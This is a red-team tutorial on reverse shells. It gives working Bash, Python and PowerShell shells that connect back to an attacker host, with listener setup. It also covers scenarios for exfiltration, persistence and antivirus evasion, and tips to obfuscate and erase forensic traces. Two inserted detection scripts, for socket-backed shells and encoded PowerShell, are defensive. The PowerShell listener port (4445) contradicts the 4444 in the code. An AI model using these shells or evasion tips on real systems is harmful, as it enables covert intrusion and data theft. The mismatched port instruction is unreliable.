
Reverse Shell 101: Practical Insights for Red Teamers

In red teaming, reverse shells are a core tool for keeping access to a compromised host, moving within a network, and escalating privileges without drawing attention. This section spends little time on theory and instead walks through practical, real-world examples that red teamers can apply directly.

Understanding Reverse Shells

A reverse shell is a shell in which the target machine initiates an outbound connection to the attacker's machine, which can then execute commands on the target. This is useful against firewalls that block inbound connections but permit outbound ones, since from the firewall's point of view the target is simply making an outgoing connection.

Setting Up a Basic Reverse Shell

Example 1: Bash Reverse Shell

One of the simplest reverse shells uses Bash alone. It works where Bash is available and network egress is not restricted; note that /dev/tcp is a Bash built-in, so a /bin/sh that is actually dash (the Debian default) cannot run this one-liner.

bash -i >& /dev/tcp/attacker_ip/4444 0>&1

Setup:

  • Attacker Machine (Kali Linux): Use nc -lvnp 4444 to listen on port 4444.

  • Target Machine: Execute the above Bash command replacing attacker_ip with the IP address of the attacker's machine.

Python Reverse Shell

Example 2: Python Reverse Shell

Python's standard library is enough to build a reverse shell in a few lines.

import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("attacker_ip", 1234))
# Point stdin, stdout and stderr at the socket so the shell reads from and writes to the listener
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p = subprocess.call(["/bin/sh", "-i"])

Setup:

  • Attacker Machine: Start a listener with nc -lvnp 1234.

  • Target Machine: Run the Python script after replacing attacker_ip with the attacker's IP.
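From the defender's side, Examples 1 and 2 leave the same host artefact: an interactive shell whose stdin, stdout and stderr are a socket rather than a tty or a pipe, which is exactly what the os.dup2 calls (or Bash's >& /dev/tcp/... redirection) produce. The following script is an added example for this write-up, not code from the original page. It checks /proc/<pid>/fd/{0,1,2} for that pattern; the shell-name list and the sample /proc tree it builds are constructed for the demonstration, and the live scan is Linux-only.

```python
"""Host-side check for the artefact every reverse shell on this page leaves behind:
a shell or interpreter whose stdin/stdout/stderr point at a socket instead of a
tty or pipe (the os.dup2 calls in Example 2, '>& /dev/tcp/...' in Example 1).
Added example for this write-up, not code from the original page. The live scan
reads Linux /proc; classify() is pure and runs on any platform."""
import os
import re
import tempfile

# Programs that, when interactive, are expected to own a tty or a pipe on fds 0-2.
# Constructed list; extend it for the interpreters present in your environment.
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ksh", "python", "perl", "php",
               "ruby", "nc", "ncat", "socat"}
SOCKET_LINK = re.compile(r"^socket:\[\d+\]$")   # readlink target of a socket fd in /proc


def classify(comm, fd_links):
    """True when `comm` (contents of /proc/<pid>/comm) names a shell/interpreter and
    at least two of fds 0,1,2 resolve to a socket. `fd_links` maps fd -> readlink
    target, e.g. {0: "socket:[4711]", 1: "socket:[4711]", 2: "/dev/null"}."""
    name = re.sub(r"[\d.]+$", "", comm.strip())  # python3.11 -> python, php8.2 -> php
    if name not in SHELL_NAMES:
        return False
    socket_fds = [fd for fd in (0, 1, 2) if SOCKET_LINK.match(fd_links.get(fd, ""))]
    return len(socket_fds) >= 2


def scan_proc(proc_root="/proc"):
    """Walk a /proc-style tree and return (pid, comm, fd_links) for each hit."""
    hits = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid_dir = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(pid_dir, "comm")) as f:
                comm = f.read().strip()
        except OSError:          # process exited, or no permission to read it
            continue
        links = {}
        for fd in (0, 1, 2):
            try:
                links[fd] = os.readlink(os.path.join(pid_dir, "fd", str(fd)))
            except OSError:
                pass
        if classify(comm, links):
            hits.append((int(entry), comm, links))
    return sorted(hits, key=lambda h: h[0])


def build_fake_proc(root):
    """Constructed sample tree: pid 101 is a bash with socket-backed stdio (what
    Examples 1 and 2 produce), pid 202 is an ordinary bash attached to a pty."""
    for pid, comm, target in ((101, "bash", "socket:[4711]"), (202, "bash", "/dev/pts/0")):
        fd_dir = os.path.join(root, str(pid), "fd")
        os.makedirs(fd_dir)
        with open(os.path.join(root, str(pid), "comm"), "w") as f:
            f.write(comm + "\n")
        for fd in (0, 1, 2):
            os.symlink(target, os.path.join(fd_dir, str(fd)))   # dangling links, as in /proc


def demo():
    """Run the scanner over the constructed tree; returns the pids it flags."""
    root = tempfile.mkdtemp()
    build_fake_proc(root)
    return [pid for pid, _, _ in scan_proc(root)]


if __name__ == "__main__":
    print("flagged in sample tree:", demo())
    if os.path.isdir("/proc"):
        print("flagged on this host:", scan_proc())
```

The two-socket threshold is deliberate: a shell with only stdin on a socket can be a legitimate inetd-style service child, whereas all three of the page's examples hand the socket to at least stdin and stdout. Run it as root to see every process; unprivileged runs silently skip the fds they cannot read.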

PowerShell Reverse Shell

Example 3: Windows PowerShell Reverse Shell

On Windows, PowerShell can build a reverse shell directly on the .NET System.Net.Sockets.TcpClient class, with no additional tooling.

$Client = New-Object System.Net.Sockets.TCPClient("192.168.56.1", 4444);
$Stream = $Client.GetStream();
[byte[]]$Buffer = New-Object byte[] 1024;
while (($I = $Stream.Read($Buffer, 0, 1024)) -ne 0) {
    $Data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($Buffer, 0, $I);
    $SendBack = (iex $Data 2>&1 | Out-String);
    $SendBack2 = $SendBack + 'PS ' + (pwd).Path + '> ';
    $SendByte = ([text.encoding]::ASCII).GetBytes($SendBack2);
    $Stream.Write($SendByte, 0, $SendByte.Length);
    $Stream.Flush();
}
$Client.Close();

Setup:

  • Attacker Machine: Listen on the specified port using nc -lvnp 4445; the listener port must match the port passed to TCPClient in the command.

  • Target Machine: Execute the PowerShell command.

Real-World Application Scenarios

  • Scenario 1: Post-Exploitation Data Exfiltration After gaining initial access through a phishing attack, a reverse shell is established to move laterally within the network, searching for sensitive data to exfiltrate.

  • Scenario 2: Maintaining Persistence Reverse shells can be integrated into scheduled tasks or services to ensure persistence even after system restarts, providing continued access for ongoing exploitation.

  • Scenario 3: Bypassing Endpoint Protection Advanced reverse shells can be encoded or encrypted to evade antivirus detection, often using tools like shikata_ga_nai encoder in Metasploit or custom encryption routines.

Tips for Effective Use

  • Obfuscation: Always obfuscate the reverse shell code to avoid detection by network monitoring tools.

  • Randomize Ports: Use non-standard ports for reverse shells to avoid typical firewall rules.

  • Cleanup: Remove traces of the reverse shell after use to avoid detection during forensic analysis.
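Scenario 3 and the Obfuscation tip describe the other side of the same coin for detection engineers: on Windows these shells are typically launched as powershell -EncodedCommand with a base64-encoded UTF-16LE script, so a rule that only greps raw command lines for TCPClient or GetStream misses them. The script below is an added example for this write-up, not code from the original page. It decodes the encoded argument before matching and scores each command line against the strings the page's own examples depend on; the log format, the indicator weights and the sample records are constructed here.

```python
"""Log-side check for the encoding/obfuscation habits in Scenario 3 and the
Obfuscation tip. Windows reverse shells are usually launched as
'powershell -EncodedCommand <base64 of UTF-16LE>', so the detector decodes the
argument before matching. Added example for this write-up, not from the
original page; log lines, indicator list and weights are constructed."""
import base64
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand; longest first.
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# (name, pattern, weight): strings the page's own examples rely on.
INDICATORS = [
    ("dev_tcp", re.compile(r"/dev/tcp/"), 2),                          # Example 1
    ("dup2", re.compile(r"os\.dup2\s*\("), 2),                         # Example 2
    ("py_socket", re.compile(r"socket\.socket\s*\("), 1),              # Example 2
    ("tcpclient", re.compile(r"sockets\.tcpclient", re.IGNORECASE), 1),  # Example 3
    ("getstream", re.compile(r"\.getstream\s*\(", re.IGNORECASE), 1),  # Example 3
    ("iex", re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE), 1),
]
THRESHOLD = 2   # constructed: total weight at which a record is reported


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # bad padding/alphabet, odd length
        return None


def score(cmdline):
    """Score one process command line; returns the evidence behind the verdict."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [name for name, pat, _ in INDICATORS if pat.search(text)]
    weight = sum(w for name, _, w in INDICATORS if name in hits)
    if decoded is not None:
        weight += 1          # encoding alone is weak evidence, but it adds up
    return {"encoded": decoded is not None, "hits": hits,
            "weight": weight, "suspicious": weight >= THRESHOLD}


def analyze(lines):
    """Pull cmdline="..." out of constructed process-creation records and score each."""
    out = []
    for line in lines:
        m = re.search(r'cmdline="([^"]*)"', line)
        if m:
            out.append(dict(score(m.group(1)), cmdline=m.group(1)))
    return out


def b64_utf16le(s):
    """Encode text the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(s.encode("utf-16-le")).decode("ascii")


# Constructed sample records (not real telemetry). The second wraps a shortened
# form of Example 3 in -enc; the third is a one-line form of Example 2.
SAMPLE_LINES = [
    'ts=2024-01-01T10:00:00Z host=ws01 event=ProcessCreate cmdline="powershell.exe -NoProfile -Command Get-Process"',
    'ts=2024-01-01T10:00:05Z host=ws01 event=ProcessCreate cmdline="powershell.exe -nop -w hidden -enc '
    + b64_utf16le('$c=New-Object System.Net.Sockets.TCPClient("10.0.0.5",4444);$s=$c.GetStream();iex $d') + '"',
    'ts=2024-01-01T10:00:09Z host=srv02 event=ProcessCreate cmdline="python3 -c import socket,os;s=socket.socket();os.dup2(s.fileno(),0)"',
]

if __name__ == "__main__":
    for r in analyze(SAMPLE_LINES):
        print(r["suspicious"], r["weight"], r["hits"], r["cmdline"][:60])
```

Weights are what make the rule usable: /dev/tcp/ and os.dup2 almost never appear in benign command lines and carry the threshold on their own, while an encoded command or a lone iex is common in administrative tooling and only counts together with other evidence. Pair the rule with the host-side stdio check above, since base64 layering or custom encryption routines defeat string matching but not the socket-on-stdin artefact.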

Conclusion

Understanding and implementing reverse shells are fundamental skills for any red teamer. By practicing these examples in controlled environments and adapting them to specific target scenarios, red teamers can enhance their capability to perform comprehensive security assessments and effectively demonstrate real-world attack vectors.

This hands-on approach ensures that red teamers are not only familiar with the theory but are also adept at applying these techniques in real-world scenarios to achieve their objectives efficiently and stealthily.
